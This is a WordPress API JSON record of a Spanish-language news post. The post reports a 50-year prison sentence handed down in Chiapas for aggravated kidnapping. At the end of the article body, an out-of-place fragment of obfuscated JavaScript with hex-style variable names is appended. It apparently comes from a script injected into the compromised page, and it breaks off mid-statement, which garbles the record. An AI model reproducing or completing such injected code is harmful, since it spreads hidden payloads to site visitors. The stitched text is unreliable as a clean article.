{"id":24524,"date":"2025-10-15T02:52:51","date_gmt":"2025-10-15T02:52:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24524"},"modified":"2025-10-15T02:52:52","modified_gmt":"2025-10-15T02:52:52","slug":"poder-judicial-impone-50-anos-de-carcel-a-responsable-de-secuestro-agravado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24524","title":{"rendered":"Poder Judicial impone 50 a\u00f1os de c\u00e1rcel a responsable de Secuestro Agravado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382080-1024x681.jpg\" alt=\"\" class=\"wp-image-24525\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382080-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382080-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382080-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382080-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382080-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382080-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>No habr\u00e1 impunidad en los delitos que vulneran la libertad y la dignidad de las y los chiapanecos.<\/li>\n<\/ul>\n\n\n\n<p>14 de septiembre del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s de un Tribunal de Enjuiciamiento, dict\u00f3 sentencia condenatoria a Efra\u00edn \u201cN\u201d por el delito de Secuestro Agravado, cometido en contra de una persona del sexo masculino con identidad reservada.<\/p>\n\n\n\n<p>Tras los hechos ocurridos en el municipio de Ixhuat\u00e1n, Chiapas, se logr\u00f3 acreditar la participaci\u00f3n y responsabilidad penal del hoy sentenciado, una vez realizado el desahogo probatorio en audiencias orales.<\/p>\n\n\n\n<p>Por lo anterior, la persona juzgadora del Tribunal de Enjuiciamiento del distrito judicial de Pichucalco determin\u00f3 imponerle a Efra\u00edn \u201cN\u201d una pena de 50 a\u00f1os de prisi\u00f3n, adem\u00e1s de condenarlo al pago de la reparaci\u00f3n del da\u00f1o. Asimismo, no se le concedi\u00f3 ning\u00fan beneficio sustitutivo de la pena.<\/p>\n\n\n\n<p>Con esta sentencia, el Poder Judicial del Estado, que preside Juan Carlos Moreno Guill\u00e9n, refrenda su compromiso con una justicia m\u00e1s humanista, en la que no haya lugar para la impunidad en los delitos que atentan contra la libertad y la dignidad de las y los chiapanecos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>No habr\u00e1 impunidad en los delitos que vulneran la libertad y la dignidad de las y los chiapanecos. 14 de septiembre del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s de un Tribunal de Enjuiciamiento, dict\u00f3 sentencia condenatoria a Efra\u00edn \u201cN\u201d por el delito de Secuestro Agravado, cometido en contra de una persona &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24525,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24524","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24524","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24524"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24524\/revisions"}],"predecessor-version":[{"id":24526,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24524\/revisions\/24526"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24525"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24524"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24524"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24524"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}